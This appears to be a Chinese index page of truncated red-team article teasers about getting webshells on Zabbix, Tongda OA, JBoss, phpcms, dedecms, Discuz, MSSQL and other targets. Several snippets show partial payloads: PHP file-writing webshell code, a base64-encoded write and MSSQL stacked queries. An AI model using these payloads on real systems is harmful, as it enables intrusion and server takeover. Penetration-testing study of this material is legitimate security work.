ATT&CK实战系列—红队实战-1 0、靶场介绍 ATT&CK实战系列—红队实战(一)是红日安全团队出品的一个实战环境,该靶场模拟真实环境。拓扑图如下: 靶场配置如下: ...
攻防打点-0day(信息泄漏)到getshell
前言整理hw资料的时候,突然发现了一次hw的纪录。整理一下(信息泄漏读到用户密码)0day-->进入后台-->文件上传-->绕过内容检测。不是星标不推送文章了。师傅也不想吧~快把极梦...
红队外网打点实战案例总结
免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立...
实战-艰难的一次zabbix getshell
前言记录一下之前实战攻防遇到的一次zabbix获取shell的过程。实战开始收集资产,发现一处zabbix存在Admin/zabbix弱口令。平平无奇,添加执行脚本getshell,以下可以选择脚本执...
通达 OA 变量覆盖及 getshell
版本 2015, 乌云平台上的漏洞, 正好最近实战也用到了 变量覆盖/logincheck.php post 数据 USERNAME=admin&PASSWORD=&MYOA_MAST...
powereasy 后台 getshell
powereasy 后台 getshell 系统设置 - 网站频道管理 - 下载中心 - 频道类型 将 上传文件的保存目录 改成 test.asp 最后左栏找到对应的频道直接上传, 抓包的路径不全, ...
帝国 cms 后台 getshell
帝国 cms 后台 getshell 系统- 数据库与系统模型 - 管理数据表 - 管理系统模型 本地新建 1.php.mod 内容 <?fputs(fopen("a.php"...
JBoss Deploy Getshell
JBoss Deploy Getshell 访问 /jmx-console/ 找到 jboss.system 点击 service=MainDeployer 找到 void deploy() 将 xx...
phpcms 后台 getshell
phpcms 后台 getshell 内容 - 专题 - 添加专题 专题导读 <?php file_put_contents('0.php',base64_decode('PD9waHAgYXN...
dedecms 友链 getshell
csrf getshell EXP<?php //print_r($_SERVER); $referer = $_SERVER['HTTP_REFERER']; $dede_...
MSSQL Log Getshell
需要支持堆查询. db_owner 权限即可. ;alter database xxxx set RECOVERY FULL-- ;create table cmd (a image)-- ;back...
discuz 后台 getshell
适用于 Discuz X3.3 及之前版本 站长 - Ucenter 设置 - Ucenter 应用 ID 填入代码 123');file_put_contents('a.php','<?php...
36